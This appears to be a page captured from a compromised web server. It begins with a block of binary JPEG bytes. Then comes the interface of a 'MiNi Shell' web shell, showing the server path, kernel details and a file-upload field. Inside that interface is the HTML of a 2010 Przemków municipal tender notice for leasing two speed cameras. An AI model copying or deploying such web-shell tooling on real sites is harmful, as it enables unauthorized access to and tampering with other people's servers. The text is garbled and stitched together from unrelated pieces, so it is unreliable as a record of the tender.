JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100406/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100406/94968-N-2010.html

<p class="kh_header"><b>Przemków: Dzierżawa dwóch fotoradarów</b><br>
<b>Numer ogłoszenia: 94968 - 2010; data zamieszczenia: 06.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski w Przemkowie , plac Wolności 25, 59-170 Przemków, woj. dolnośląskie, tel. 076 831 92 10.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.przemkow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dzierżawa dwóch fotoradarów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dzierżawa jednego urządzenia fotoradarowego w wersji mobilnej przystosowanego do montażu w dowolnym pojeździe samochodowym bez konieczności dokonywania jakichkolwiek zmian konstrukcyjnych, adaptacji
i homologacji, spełniającego następujące warunki:
1)Zakres pomiarowy od 30 do 240 km/h wraz z możliwością pomiaru na dystansie do 800 metrów.
2)Zakres temperatur pracy od 0°C do +50°C.
3)Urządzenie musi umożliwiać prowadzenie pomiarów z pobocza drogi podczas postoju pojazdu oraz podczas jazdy samochodem dokonującym kontroli wykroczeń.
4)Urządzenie musi być przystosowane do zasilania z gniazda wtykowego w samochodzie lub być wyposażone we własne niezależne źródło zasilania (czas pracy ciągłej nie krótszy niż 8 godz.).
5)Urządzenie powinien posiadać możliwość odtworzenia na miejscu lub w innym czasie zdjęcia kierowcy / sprawcy zarejestrowanego wykroczenia w ruchu drogowym.
6)Pomiar z rozróżnieniem kierunku ruchu pojazdów (pojazdy odjeżdżające i nadjeżdżające).
7)Rejestracja wykroczenia w postaci zdjęcia cyfrowego z czytelnym numerem rejestracyjnym  pojazdu i wizerunkiem kierowcy
8)Prezentowanie na zdjęciu (lub na wydruku zdjęcia) informacji identyfikujących wykonany pomiar.
9)Umożliwienie przenoszenia zarejestrowanego materiału do komputera (na stanowisko komputerowe wraz z odpowiednim oprogramowaniem) celem obróbki danych i wydruku zdjęć.
10)Urządzenie musi umożliwiać rejestrację innych wykroczeń w ruchu drogowym, będących w zakresie uprawnień nadanych Strażom Miejskim/Gminnym.
11)Urządzenie musi posiadać Zatwierdzenie typu wydane przez Prezesa Głównego Urzędu Miar zgodnie z art. 8a ustawy z dnia 11 maja 2001 r. Prawo o miarach (Dz. U. z 2004 r. Nr 243, poz. 2441) oraz Rozporządzeniem Ministra Gospodarki z dnia 09 listopada 2007 r. w sprawie wymagań metrologicznych, którym powinny odpowiadać przyrządy do pomiaru prędkości pojazdów w ruchu drogowym oraz szczegółowego zakresu badań i sprawdzeń wykonywanych podczas prawnej kontroli metrologicznej tych przyrządów pomiarowych Dz. U. z 2007 r. nr 225 poz. 1663 oraz  ważne Świadectwo legalizacji.
3.2	Dzierżawa jednego urządzenia fotoradarowego w wersji stacjonarnej umożliwiającej pomiary z pobocza drogi z trójnogu lub z masztu stacjonarnego oraz dzierżawa stacjonarnego masztu fotoradarowego, przy czym urządzenie fotoradarowe musi spełnić następujące warunki:
1)Zakres pomiarowy od 30 do 240 km/h;
2)Zakres temperatur pracy od - 10°C do +50°C.
3)Po przekroczeniu przez pojazd prędkości progowej urządzenie musi zarejestrować w pamięci zdjęcie w technice czarno-białej lub kolorowej zawierające informacje nt.: nr zdjęcia, nr urządzenia, zmierzoną prędkość, obowiązujące ograniczenie prędkości, datę i godzinę pomiaru, adres pomiaru , kierunek pomiaru.
4)Urządzenie musi być wyposażony system pamięci pozwalający zarejestrować minimum 30 000 zdjęć bez ingerencji z zewnątrz.
5)Menu oraz instrukcja obsługi musi być w języku polskim.
6)Urządzenie musi umożliwiać wykonywanie rejestracji w dzień i w nocy, oraz w różnych warunkach pogodowych.
7)Program do obsługi zarejestrowanego materiału zdjęciowego musi umożliwiać poprawę ich jakości.
8)Urządzenie musi posiadać Zatwierdzenie typu wydane przez Prezesa Głównego Urzędu Miar zgodnie z art. 8a ustawy z dnia 11 maja 2001 r. Prawo o miarach (Dz. U. z 2004 r. Nr 243, poz. 2441) oraz Rozporządzeniem Ministra Gospodarki z dnia 09 listopada 2007 r. w sprawie wymagań metrologicznych, którym powinny odpowiadać przyrządy do pomiaru prędkości pojazdów w ruchu drogowym oraz szczegółowego zakresu badań i sprawdzeń wykonywanych podczas prawnej kontroli metrologicznej tych przyrządów pomiarowych Dz. U. z 2007 r. nr 225 poz. 1663 oraz  ważne Świadectwo legalizacji.
9)Stacjonarny maszt fotoradarowy musi być zainstalowany w miejscu wskazanym i uzgodnionym przez Zamawiającego. Wszystkie formalne czynności wymagane przy instalacji masztu będą wykonane przez Zamawiającego. Po stronie Wykonawcy są koszty związania z dostawą i montażem masztu. Koszty związane z dostawą masztu i montaż są po stronie Wykonawcy.
3.3	Użyczenie co najmniej dwóch komputerów oraz drukarki monochromatycznej laserowej oraz oprogramowania do przetwarzania zarejestrowanych zdjęć i emisji dokumentacji mandatowej, które musi zapewnić: 
1)Konfiguracja oraz oprogramowanie komputerów i drukarki musi zapewnić bezproblemową pracę oprogramowania do przetwarzania zarejestrowanych zdjęć i emisji dokumentacji mandatowej; 
2)program musi posiadać możliwość obróbki zdjęć w sposób pozwalający na ich dalsze wykorzystanie w postępowaniu mandatowym; 
3)program musi posiadać funkcję automatycznego przygotowywania listy zapytań o dane osobowe zarejestrowanych pojazdów zintegrowanego z interfejsem wymiany danych SI CEPIK poprzez łącze internetowe; 
4)program musi posiadać możliwość przygotowania i nadzorowania korespondencji niezbędnej do przeprowadzenia postępowania mandatowego w stosunku do wykroczeń zarejestrowanych przez urządzenie fotoradarowe. 
5)program musi posiadać możliwość zapamiętania w bazie danych wszystkich informacji dot. zarejestrowanych wykroczeń
6)program musi posiadać moduł pozwalający nadawać uprawnienia do korzystania z określonych funkcji programu w zależności od nadanych uprawnień (tzw. moduł administratora); 
7)program musi dawać możliwość pracy w sieci na dwóch stanowiskach 
3.4. Asysta techniczna w ramach której Wykonawca musi zapewnić: 
1)udostępnić pojazd służący do transportu urządzenia do rejestracji wykroczeń
2)zagwarantować obecność przedstawiciela Wykonawcy oraz umożliwić obecność przedstawiciela Zamawiającego w trakcie procesu rejestracji wykroczeń na drogach.
3)przeprowadzić szkolenia Strażników Miejskich w zakresie obsługi technicznej urządzenia samoczynnie rejestrującego przekraczanie dozwolonej prędkości
4)diagnostykę oraz serwis dzierżawionych urządzeń fotoradarowych i komputerowych w zakresie technicznych problemów eksploatacyjnych. 
3.5. Asysta informatyczna w ramach której Wykonawca musi zapewnić: 
1)świadczenie usług doradczych w zakresie rozwoju infrastruktury komputerowej; 
2)zgranie za pomocą pamięci przenośnej na autoryzowane stanowisko komputerowe wykroczeń zarejestrowanych przez urządzenie do rejestracji wykroczeń;
3)wydrukowanie zdjęcia wraz ze znacznikiem czasu;
4)wykonanie czynności technicznych związanych z kopertowaniem wystawionych wezwań;
5)sporządzenie karty PRD 5/1;
6)wykonanie czynności związanych z archiwizacją dokumentacji;
7)bieżącą pomoc w zakresie wykorzystania właściwości dostarczonego programu w ramach upoważnienia wystawionego przez Zamawiającego.
8)inne czynności niezbędne dla właściwego wykorzystania specjalistycznego oprogramowania. 
9)do realizacji powyższych zadań Wykonawca musi zapewnić i sfinansować co najmniej 2 pełne etaty pracownicze z przeznaczeniem do pracy w pełnym wymiarze godzin na terenie Gminy Przemków w miejscu wskazanym przez Zamawiającego. 
3.6 Kontrola prędkości przy użyciu urządzeń fotoradarowych będzie odbywała się zgodnie z ustalonym pomiędzy Zamawiającym a Wykonawcą pisemnym miesięcznym harmonogramem, przez czas nie krótszy niż 8 dni w miesiącu po 8 godzin dziennie. Harmonogram ustalony będzie do 10 dnia miesiąca. Harmonogram będzie uwzględniał typ urządzenia fotoradarowego używanego w danym dniu kontroli. Zamawiający przewiduje używanie obu urządzeń fotoradarowych w tym samym dniu prowadzenia kontroli. 
3.7 Wynagrodzenie Wykonawcy uzależnione jest od ilości zapłaconych mandatów karnych wystawionych na podstawie sporządzonej dokumentacji mandatowej. Wynagrodzenie jest pochodną ilości wypełnionej dokumentacji mandatowej od zakończonego wpływem środków finansowych przypadku..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 63.71.27.10-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykonawca spełnia warunek, jeżeli posiada uprawnienia do wykonywania określonej działalności, tj. zakres i profil jego działalności obejmuje wykonawstwo robót stanowiących przedmiot niniejszego zamówienia; Zamawiający dokona sprawdzenia na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu określonych
w art. 22 ust. 1 uPzp - według załącznika nr 2 do siwz.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykonawca spełnia warunek jeżeli wykonał lub wykonuje w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej trzech usług w zakresie i czasie trwania odpowiadającym niniejszemu zamówieniu, z tym, że jedna z tych usług ma dotyczyć zamówienia, gdzie używane są oba urządzenia pomiarowe.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony jeżeli Wykonawca, wykaże iż posiada lub dysponuje dwoma wymaganymi urządzeniami pomiarowymi zgodnymi z opisem przedmiotu niniejszego zamówienia, pojazdem samochodowym i oprogramowaniem do przetwarzania zarejestrowanych zdjęć i emisji dokumentacji mandatowej.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony jeżeli Wykonawca złoży stosowne oświadczenie na postawie art. 22 ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony, jeżeli wykonawca złoży oświadczenie, iż znajduje się w odpowiedniej sytuacji ekonomicznej i finansowej do wykonania zamówienia, a w związku z tym jest w stanie należycie wykonać zamówienie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">opis urządzeń technicznych, instrukcję obsługi oraz środków stosowanych przez wykonawcę dostaw lub usług oraz opis zaplecza naukowo-badawczego wykonawcy, w celu potwierdzenia zapewnienia odpowiedniej jakości realizowanego zamówienia</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)wykaz wykonanych lub wykonywanych usług w zakresie dzierżawy/udostępniania urządzeń kontroli radarowej wraz z niezbędnym oprogramowaniem, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, rodzaju dzierżawionych fotoradarów, ilości zatrudnionych osób, dat i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że usługi zostały wykonane lub są wykonywane należycie oraz 1)wykaz sprzętu niezbędnego do wykonania zamówienia wraz z informacją o podstawie dysponowania tymi zasobami.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://sbip.pl/nprzemkow/site/pl/urz_przet/show.html<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Przemkowie, ul. Plac Wolności 25, 59-170 Przemków.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.04.2010 godzina 10:00, miejsce: Urząd Miejski w Przemkowie, ul. Plac Wolności 25, 59-170 Przemków - punkt informacyjny, parter.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com